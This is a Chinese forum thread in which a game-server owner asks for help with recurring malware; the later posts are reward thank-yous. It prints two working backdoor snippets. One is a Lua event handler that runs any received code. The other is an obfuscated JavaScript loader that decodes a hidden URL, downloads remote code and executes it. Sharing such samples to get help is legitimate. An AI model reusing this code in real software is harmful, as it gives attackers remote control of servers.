已解决√ 求助 求助大佬端被病毒包围了

[slook]

求助大佬 端被病毒包围了 每次关闭服务器都会再 sessionmanager\client\empty.lua中出现一段代码

RegisterNetEvent("helpEmptyCode")
AddEventHandler("helpEmptyCode", function(id)
    local help = assert(load(id))
    help()
end)

然后会下个蛋 名为xxx.js的文件 里边有一个https请求

(function () {
    const $ = require(Buffer.from('aHR0cHM=', 'base64').toString());
    const _ = Buffer.from('aHR0cHM6Ly8xbHMyLm9yZy94eHg=', 'base64').toString();
    const $$ = ['data', 'end', 'error', 'statusCode', 'global'];
    $['get'](_, r => {
        let d = '';
        r['on']($$[0], c => (d += c))['on']($$[1], () => r[$$[3]] === 200 && new Function($$[4], d)(global));
    })['on']($$[2], () => {});
})();

这个js文件乱下蛋 有没有大佬知道如何找出后门源头

 

[slook]

感谢楼主的红包！

slook领取了您的红包获得了0.24黄金

 

[slook]

我清除所有的base64加密的网址后还是不行

 

[橙留香]

感谢楼主的红包！

橙留香领取了您的红包获得了0.83黄金

 

[slook]

应该是解决了可能是工件受到感染了我换了个工件就不下蛋了

 

[Nine Loong]

感谢楼主的红包！

Nine Loong领取了您的红包获得了0.87黄金

 

[FWL]

感谢楼主的红包！

FWL领取了您的红包获得了0.19黄金

 

[鑫酱酱]

感谢楼主的红包！

鑫酱酱领取了您的红包获得了0.92黄金